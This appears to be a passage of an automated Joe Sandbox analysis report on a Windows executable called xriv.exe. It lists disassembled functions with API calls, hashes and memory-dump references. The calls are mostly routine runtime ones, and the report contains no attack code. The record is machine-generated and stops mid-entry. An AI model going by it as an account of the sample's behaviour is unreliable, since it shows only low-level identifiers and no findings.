                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                          • API String ID: 0-4106172500
                                                          • Opcode ID: 1d6252b43bcaa5b7eb8b04e4332a79c8202e8afff372c283523e6b85840a92d6
                                                          • Instruction ID: b3ad7c786f3ead8611c6547d1e8409cb97816e856e11656074f1eb77d750cdfb
                                                          • Opcode Fuzzy Hash: 1d6252b43bcaa5b7eb8b04e4332a79c8202e8afff372c283523e6b85840a92d6
                                                          • Instruction Fuzzy Hash: E9210471204205BFDF21BF658C80E6B77ADEF183A87144114FA1993251EB31ED408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          • Opcode ID: 47862ae4308d20b5fca48c598bddeb85252e7611ffb6b110e64311455471c15a
                                                          • Instruction ID: 0af7a7a4675c57b9bba871adf9c08b5637262fed70c0490fa7a9967425a50fd5
                                                          • Opcode Fuzzy Hash: 47862ae4308d20b5fca48c598bddeb85252e7611ffb6b110e64311455471c15a
                                                          • Instruction Fuzzy Hash: 9901963BA0862535AB143019AC4266767ED9BD2BB072A002EF948F72C2EF55DE434B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-
                                                          • API String ID: 0-2084034818
                                                          • Opcode ID: 49a41b3f68a686d8293960611d82107e7c6d8bb0840717e3b8b3b25ae0e5c55a
                                                          • Instruction ID: dad9800df9d601c90322554df2b99fed01daa0142189572b301c92713cc42d89
                                                          • Opcode Fuzzy Hash: 49a41b3f68a686d8293960611d82107e7c6d8bb0840717e3b8b3b25ae0e5c55a
                                                          • Instruction Fuzzy Hash: B6119B32E01221ABDF31AB25DC84A7A37949F057B8B190519F905A7290D730EE40CFE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0018A9D8,0018E000,?,0018A9A0,0018AF26,?,0018E000), ref: 0018A9F8
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0018AA0B
                                                          • FreeLibrary.KERNEL32(00000000,?,?,0018A9D8,0018E000,?,0018A9A0,0018AF26,?,0018E000), ref: 0018AA2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 5dfbd547b658b05efa4d982ec7de94cdacee094aa09fd0e2a763b08c33621c9c
                                                          • Instruction ID: 001a1e28a4497d6ab8bd25cf4a7e5f70a6cebb3cb9abb67cc964073175cf2cd9
                                                          • Opcode Fuzzy Hash: 5dfbd547b658b05efa4d982ec7de94cdacee094aa09fd0e2a763b08c33621c9c
                                                          • Instruction Fuzzy Hash: 43F08C30601218FBEB15EB50DE09B9E7FA9EF04B56F140066B500E24A0DB748F41DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCPInfo.KERNEL32(0101F658,0101F658,?,7FFFFFFF,?,?,00196325,0101F658,0101F658,?,0101F658,?,?,?,?,0101F658), ref: 0019610C
                                                          • __alloca_probe_16.LIBCMT ref: 001961C2
                                                          • __alloca_probe_16.LIBCMT ref: 00196258
                                                          • __freea.LIBCMT ref: 001962C3
                                                          • __freea.LIBCMT ref: 001962CF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alloca_probe_16__freea$Info
                                                          • String ID:
                                                          • API String ID: 2330168043-0
                                                          • Opcode ID: 73f8c1502d69d74d7be92b019683acb1481958f4ce955b02191c6649a0eed0a1
                                                          • Instruction ID: 307ed539b4121dcf85cb8c42409a766544712b1c32a5755b015557668a3aa977
                                                          • Opcode Fuzzy Hash: 73f8c1502d69d74d7be92b019683acb1481958f4ce955b02191c6649a0eed0a1
                                                          • Instruction Fuzzy Hash: 4981A072D0021AABDF219FA4CC81AEE7BB9EF5A754F190169F804A7281D725DD40CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 00194A18
                                                          • __alloca_probe_16.LIBCMT ref: 00194ADE
                                                          • __freea.LIBCMT ref: 00194B4A
                                                            • Part of subcall function 0018DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018DB6E
                                                          • __freea.LIBCMT ref: 00194B53
                                                          • __freea.LIBCMT ref: 00194B76
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1423051803-0
                                                          • Opcode ID: 0226168a047d3cb8334d603df2678791a917db00e5b28933b559204a72e3165d
                                                          • Instruction ID: c868f2fae7bb84f3fa9e7098edfa62d21b538441215f802c7daea71b21fe389d
                                                          • Opcode Fuzzy Hash: 0226168a047d3cb8334d603df2678791a917db00e5b28933b559204a72e3165d
                                                          • Instruction Fuzzy Hash: E651E172600206AFEF259F609C41FBB77A9DF55764F1A0128FC0A97140EB30DD428BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0018B0E0), ref: 0018B1D0
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 0018B22A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0018B0E0,?,000000FF,00000000,00000000), ref: 0018B2B8
                                                          • __dosmaperr.LIBCMT ref: 0018B2BF
                                                          • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0018B2FC
                                                            • Part of subcall function 0018B524: __dosmaperr.LIBCMT ref: 0018B559
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                          • String ID:
                                                          • API String ID: 1206951868-0
                                                          • Opcode ID: f1753e560012473ddc923ce89d9605f1c2935cb6b50bda42f07b34c8a85a515d
                                                          • Instruction ID: 979ea93aa5434a127f278a0b24c31b5eeb4dab187d05b3aba60da66cf33eaa79
                                                          • Opcode Fuzzy Hash: f1753e560012473ddc923ce89d9605f1c2935cb6b50bda42f07b34c8a85a515d
                                                          • Instruction Fuzzy Hash: E1413A75904604ABDB24EFB5D8859AFBBF9FF89300B10452AF856D3611EB30AA44CF21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 001913B4
                                                            • Part of subcall function 0018D653: HeapFree.KERNEL32(00000000,00000000,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?), ref: 0018D669
                                                            • Part of subcall function 0018D653: GetLastError.KERNEL32(?,?,0019142F,?,00000000,?,?,?,00191456,?,00000007,?,?,00191858,?,?), ref: 0018D67B
                                                          • _free.LIBCMT ref: 001913C6
                                                          • _free.LIBCMT ref: 001913D8
                                                          • _free.LIBCMT ref: 001913EA
                                                          • _free.LIBCMT ref: 001913FC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: dfbe1e52c41cbd527274d144532443debe0fd488167f7c6b3b8b296330c97dc8
                                                          • Instruction ID: 4d19103a88fcd6c2df441021d9bf0a0f7dadc7eb4c2ba0dfbc937cb7158959ce
                                                          • Opcode Fuzzy Hash: dfbe1e52c41cbd527274d144532443debe0fd488167f7c6b3b8b296330c97dc8
                                                          • Instruction Fuzzy Hash: A4F0FF7250420677CA20EF69F482C1A73F9BB157647B44806F45DD7981DB30FEC0CA98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: *?
                                                          • API String ID: 269201875-2564092906
                                                          • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                          • Instruction ID: 56393b2a189caf40a6f5e8ae8775c5ec3d6b72f6b983b03aa0aaf92011101d06
                                                          • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                          • Instruction Fuzzy Hash: 3A611976D002199FDB14EFA9C8819EDBBF5EF58310B25816AE815E7340E771AF428F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: 1ea0d0d1e7a1c628ad23eb467f1d355d301d849bf2df3c97c881e4165ca00561
                                                          • Instruction ID: 27f01ddb112c3371b76873627e7f294292c5114897a13dc8a0e1118419e5b3f4
                                                          • Opcode Fuzzy Hash: 1ea0d0d1e7a1c628ad23eb467f1d355d301d849bf2df3c97c881e4165ca00561
                                                          • Instruction Fuzzy Hash: 3151BF72A00202AFDB28AF14D841B7AB7A4FF50315F68452EE941576D1EB31EF80CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetVersionExW.KERNEL32(0000011C,?,5D32641E,00000000), ref: 00174D89
                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00174DF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00174DF7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcVersion
                                                          • String ID:
                                                          • API String ID: 3310240892-0
                                                          • Opcode ID: c197a443600aa8cb1af619f4f0f0dacd26fd76f38873af8a511c742ca73d50c1
                                                          • Instruction ID: 866fb276093567d5df49f8435335fbb9b39722bd4256827864e6e29827115b26
                                                          • Opcode Fuzzy Hash: c197a443600aa8cb1af619f4f0f0dacd26fd76f38873af8a511c742ca73d50c1
                                                          • Instruction Fuzzy Hash: 0651E6719002189BEB14EF68CD897EDBB75FB55310F508299E419A72C1EF359EC08F91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0019509E
                                                          • _free.LIBCMT ref: 001950C7
                                                          • SetEndOfFile.KERNEL32(00000000,001925FD,00000000,0018D4F0,?,?,?,?,?,?,?,001925FD,0018D4F0,00000000), ref: 001950F9
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,001925FD,0018D4F0,00000000,?,?,?,?,00000000), ref: 00195115
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          • Opcode ID: 807ea7518681a50f1b9345fc36e6efc9d5e3fe771973a0feac39e4ce08f684b7
                                                          • Instruction ID: 3f33f4717683efe94210553c03a05655c209a5a384864d642e5b5396241734ed
                                                          • Opcode Fuzzy Hash: 807ea7518681a50f1b9345fc36e6efc9d5e3fe771973a0feac39e4ce08f684b7
                                                          • Instruction Fuzzy Hash: 2041B672900A059BDF12BFA8DC46B9E37B7AF54360F2C0611F915F7292EB34D9418BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018AE0F: _free.LIBCMT ref: 0018AE1D
                                                            • Part of subcall function 00190971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00194B40,?,00000000,00000000), ref: 00190A13
                                                          • GetLastError.KERNEL32 ref: 0018FA02
                                                          • __dosmaperr.LIBCMT ref: 0018FA09
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0018FA48
                                                          • __dosmaperr.LIBCMT ref: 0018FA4F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                          • String ID:
                                                          • API String ID: 167067550-0
                                                          • Opcode ID: 6644a1b5e663845e6060a4013eb0154f661e57c4ae0785a52250b7b254eb067c
                                                          • Instruction ID: 6df1fd1fb1669cbe041e1ee60007e1568f8992a2d38fb168770b3e3859923763
                                                          • Opcode Fuzzy Hash: 6644a1b5e663845e6060a4013eb0154f661e57c4ae0785a52250b7b254eb067c
                                                          • Instruction Fuzzy Hash: BC21F172604209BF9B14BF658C8192BB7ADEF54378310453DF91987241EB30EE018FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,0018AD8D,00000000,?,?,?,0018AF26,?), ref: 0018DF49
                                                          • _free.LIBCMT ref: 0018DFA6
                                                          • _free.LIBCMT ref: 0018DFDC
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0018AF26,?), ref: 0018DFE7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: cef6324934d55cf9f2d6c912966200ea8b73f7899508b3ef19c7143077751bf6
                                                          • Instruction ID: 5364248c330b167797ceb8d3df7f7505931f5c62b2cda2894b6ffc5bf0c1c05e
                                                          • Opcode Fuzzy Hash: cef6324934d55cf9f2d6c912966200ea8b73f7899508b3ef19c7143077751bf6
                                                          • Instruction Fuzzy Hash: 4A11A3323087112AC6103774BC85D2A27EA9BD2774B250224F22AC66D1DF318E93AF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,0018B7F5,0018DB7F,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018E0A0
                                                          • _free.LIBCMT ref: 0018E0FD
                                                          • _free.LIBCMT ref: 0018E133
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00188272,?,?,?,?,?,001720C3,?,?), ref: 0018E13E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 2c3e49b835ea12997debc29a5b1d4e17638cfc5d7d2de65e316ace0b92828a8b
                                                          • Instruction ID: bf3b8f352f034401cae5fe4ee48242966700cb3a51b83b4c5e9cfcd39ffa1627
                                                          • Opcode Fuzzy Hash: 2c3e49b835ea12997debc29a5b1d4e17638cfc5d7d2de65e316ace0b92828a8b
                                                          • Instruction Fuzzy Hash: D411C8723046116ED6117774AC89D2B26FADBE2775B250234F129C36D1DFB18EA38F10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0018E9E2,00000000,?,0019370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0018E893
                                                          • GetLastError.KERNEL32(?,0019370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0018E9E2,00000000,00000104,?), ref: 0018E89D
                                                          • __dosmaperr.LIBCMT ref: 0018E8A4
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2398240785-0
                                                          • Opcode ID: 22d60ec0f224f2747f1574268d8bfd63412da41ab0d0c54f4321660d317933a1
                                                          • Instruction ID: 32a847d88d38f98c5b731cde71e67965701368e73e634ec47b2f2f6aad9529a2
                                                          • Opcode Fuzzy Hash: 22d60ec0f224f2747f1574268d8bfd63412da41ab0d0c54f4321660d317933a1
                                                          • Instruction Fuzzy Hash: B9F03132700115BB8B207FA6DC0895ABFEAFF563A03054921F519C7560C731E961DFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0018E9E2,00000000,?,00193695,00000000,00000000,0018E9E2,?,?,00000000,00000000,00000001), ref: 0018E8FC
                                                          • GetLastError.KERNEL32(?,00193695,00000000,00000000,0018E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0018E9E2,00000000,00000104), ref: 0018E906
                                                          • __dosmaperr.LIBCMT ref: 0018E90D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445568695.00000000001AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_170000_xriv.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2398240785-0
                                                          • Opcode ID: 8f73453e03bb9108877240766f33a4ec2df0273bcea3195c3c2c145e48847ea9
                                                          • Instruction ID: b9589941fdbeab300bfb7818ff5314bf62d11239128f62a8bf85861de6c42021
                                                          • Opcode Fuzzy Hash: 8f73453e03bb9108877240766f33a4ec2df0273bcea3195c3c2c145e48847ea9
                                                          • Instruction Fuzzy Hash: 27F08132A00115BB8B207FA2CC48956BFE9FF843A43054525F51CD6520C771EA51CFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00175140,0000000F,001A68F8,00000000,00175140,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140), ref: 001963A6
                                                          • GetLastError.KERNEL32(?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000,00175140,?,00193421,00175140), ref: 001963B2
                                                            • Part of subcall function 00196378: CloseHandle.KERNEL32(FFFFFFFE,001963C2,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000,00175140), ref: 00196388
                                                          • ___initconout.LIBCMT ref: 001963C2
                                                            • Part of subcall function 0019633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00196369,00195A94,00175140,?,00192ECD,00000000,?,00175140,00000000), ref: 0019634D
                                                          • WriteConsoleW.KERNEL32(00175140,0000000F,001A68F8,00000000,?,00195AA7,00175140,00000001,00175140,00175140,?,00192ECD,00000000,?,00175140,00000000), ref: 001963D7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Offset: 00170000, based on PE: true
                                                          • Associated: 00000008.00000002.445400142.0000000000170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000008.00000002.445561898.00000000001A8000.00000004.00000001.01000000.00000009.sdmpDownload File
